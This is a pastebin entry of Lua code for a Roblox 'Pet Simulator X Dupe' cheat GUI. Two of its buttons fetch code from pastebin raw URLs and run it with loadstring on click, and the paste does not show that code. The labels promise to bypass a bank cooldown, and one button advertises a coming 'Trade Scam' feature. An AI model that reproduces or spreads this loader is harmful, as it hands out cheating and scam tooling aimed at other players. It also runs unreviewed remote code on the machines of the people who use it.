Facebook
From kamil, 2 Years ago, written in Plain Text.
This paste is a reply to New Dupe Pets Method Works from Hacker Preston - view diff
Embed
Download Paste or View Raw
Hits: 653
  1. local ScreenGui = Instance.new("ScreenGui")
  2. local Frame = Instance.new("Frame")
  3. local line = Instance.new("Frame")
  4.  
  5. local Frame_2 = Instance.new("Frame")
  6. local UICorner = Instance.new("UICorner")
  7. local dupemisc = Instance.new("TextLabel")
  8. local TextLabel = Instance.new("TextLabel")
  9. local UICorner_2 = Instance.new("UICorner")
  10. local newdupe = Instance.new("TextButton")
  11. local UICorner_3 = Instance.new("UICorner")
  12. local olddupe = Instance.new("TextButton")
  13. local UICorner_4 = Instance.new("UICorner")
  14. local timer = Instance.new("TextLabel")
  15. local n = Instance.new("TextButton")
  16. local UICorner_5 = Instance.new("UICorner")
  17. local misc = Instance.new("TextLabel")
  18. local dupesign = Instance.new("TextLabel")
  19.  
  20. ScreenGui.Parent = game.CoreGui
  21. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  22.  
  23. Frame.Parent = ScreenGui
  24. Frame.BackgroundColor3 = Color3.fromRGB(166, 143, 255)
  25. Frame.Position = UDim2.new(0.100236796, 0, 0.230110154, 0)
  26. Frame.Size = UDim2.new(0, 283, 0, 367)
  27. Frame.Active = true
  28. Frame.Draggable = true
  29.  
  30. line.Name = "line"
  31. line.Parent = Frame
  32. line.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  33. line.Position = UDim2.new(0, 0, 0.144414172, 0)
  34. line.Size = UDim2.new(0, 283, 0, 2)
  35.  
  36. Frame_2.Parent = Frame
  37. Frame_2.BackgroundColor3 = Color3.fromRGB(104, 90, 212)
  38. Frame_2.Position = UDim2.new(0.0247349832, 0, 0.0735694841, 0)
  39. Frame_2.Size = UDim2.new(0, 43, 0, 26)
  40.  
  41. UICorner.Parent = Frame_2
  42.  
  43. dupemisc.Name = "dupemisc"
  44. dupemisc.Parent = Frame
  45. dupemisc.BackgroundColor3 = Color3.fromRGB(104, 90, 212)
  46. dupemisc.BorderSizePixel = 0
  47. dupemisc.Position = UDim2.new(0, 7, 0.0900000036, 0)
  48. dupemisc.Size = UDim2.new(0, 43, 0, 19)
  49. dupemisc.Font = Enum.Font.GothamBlack
  50. dupemisc.Text = "Dupe"
  51. dupemisc.TextColor3 = Color3.fromRGB(0, 0, 0)
  52. dupemisc.TextSize = 14.000
  53.  
  54. TextLabel.Parent = Frame
  55. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  56. TextLabel.BackgroundTransparency = 1.000
  57. TextLabel.BorderSizePixel = 0
  58. TextLabel.Position = UDim2.new(0.0247349832, 0, 0, 0)
  59. TextLabel.Size = UDim2.new(0, 269, 0, 21)
  60. TextLabel.Font = Enum.Font.GothamBold
  61. TextLabel.Text = "Pet Simulator X Dupe - v2.8. zafu#5330"
  62. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  63. TextLabel.TextScaled = true
  64. TextLabel.TextSize = 14.000
  65. TextLabel.TextWrapped = true
  66.  
  67. UICorner_2.CornerRadius = UDim.new(0, 16)
  68. UICorner_2.Parent = Frame
  69.  
  70. newdupe.Name = "newdupe"
  71. newdupe.Parent = Frame
  72. newdupe.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  73. newdupe.Position = UDim2.new(0.0247349832, 0, 0.228882834, 0)
  74. newdupe.Size = UDim2.new(0, 269, 0, 29)
  75. newdupe.Visible = false
  76. newdupe.Font = Enum.Font.GothamBold
  77. newdupe.Text = "NEW UPDATED DUPE! (v2.8)"
  78. newdupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  79. newdupe.TextSize = 18.000
  80. newdupe.TextWrapped = true
  81. newdupe.MouseButton1Down:connect(function()
  82.         loadstring(game:HttpGet('https://pastebin.com/raw/00aKLfPk'))()
  83. end)
  84.  
  85. UICorner_3.Parent = newdupe
  86.  
  87. olddupe.Name = "olddupe"
  88. olddupe.Parent = Frame
  89. olddupe.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  90. olddupe.Position = UDim2.new(0.0247349832, 0, 0.340599447, 0)
  91. olddupe.Size = UDim2.new(0, 269, 0, 27)
  92. olddupe.Visible = false
  93. olddupe.Font = Enum.Font.GothamBold
  94. olddupe.Text = "OLD DUPE (v2.7)"
  95. olddupe.TextColor3 = Color3.fromRGB(0, 0, 0)
  96. olddupe.TextSize = 18.000
  97. olddupe.TextWrapped = true
  98. olddupe.MouseButton1Down:connect(function()
  99.         loadstring(game:HttpGet('https://pastebin.com/raw/w6BUp12s'))()
  100. end)
  101.  
  102. UICorner_4.Parent = olddupe
  103.  
  104. timer.Name = "timer"
  105. timer.Parent = Frame
  106. timer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  107. timer.BackgroundTransparency = 1.000
  108. timer.BorderSizePixel = 0
  109. timer.Position = UDim2.new(0.0247349832, 0, 0.228882834, 0)
  110. timer.Size = UDim2.new(0, 269, 0, 61)
  111. timer.Font = Enum.Font.GothamBold
  112. timer.Text = "Dupe buttons will appear after 30 seconds to bypass bank cooldown."
  113. timer.TextColor3 = Color3.fromRGB(0, 0, 0)
  114. timer.TextScaled = true
  115. timer.TextSize = 14.000
  116. timer.TextWrapped = true
  117.  
  118. n.Name = "n"
  119. n.Parent = Frame
  120. n.BackgroundColor3 = Color3.fromRGB(198, 62, 198)
  121. n.Position = UDim2.new(0.0247349832, 0, 0.577656686, 0)
  122. n.Size = UDim2.new(0, 269, 0, 31)
  123. n.Font = Enum.Font.GothamBold
  124. n.Text = "Trade Scam (SOON)"
  125. n.TextColor3 = Color3.fromRGB(0, 0, 0)
  126. n.TextSize = 18.000
  127. n.TextWrapped = true
  128.  
  129. UICorner_5.Parent = n
  130.  
  131. misc.Name = "misc"
  132. misc.Parent = Frame
  133. misc.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  134. misc.BackgroundTransparency = 1.000
  135. misc.BorderSizePixel = 0
  136. misc.Position = UDim2.new(0.0247349832, 0, 0.493188024, 0)
  137. misc.Size = UDim2.new(0, 269, 0, 22)
  138. misc.Font = Enum.Font.GothamBold
  139. misc.Text = "MISC"
  140. misc.TextColor3 = Color3.fromRGB(0, 0, 0)
  141. misc.TextScaled = true
  142. misc.TextSize = 14.000
  143. misc.TextWrapped = true
  144.  
  145. dupesign.Name = "dupesign"
  146. dupesign.Parent = Frame
  147. dupesign.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  148. dupesign.BackgroundTransparency = 1.000
  149. dupesign.BorderSizePixel = 0
  150. dupesign.Position = UDim2.new(0.0247349832, 0, 0.168937355, 0)
  151. dupesign.Size = UDim2.new(0, 269, 0, 22)
  152. dupesign.Font = Enum.Font.GothamBold
  153. dupesign.Text = "DUPE"
  154. dupesign.TextColor3 = Color3.fromRGB(0, 0, 0)
  155. dupesign.TextScaled = true
  156. dupesign.TextSize = 14.000
  157. dupesign.TextWrapped = true
  158.  
  159. wait(30)
  160.  
  161. timer.Visible = false
  162. newdupe.Visible = true
  163. olddupe.Visible = true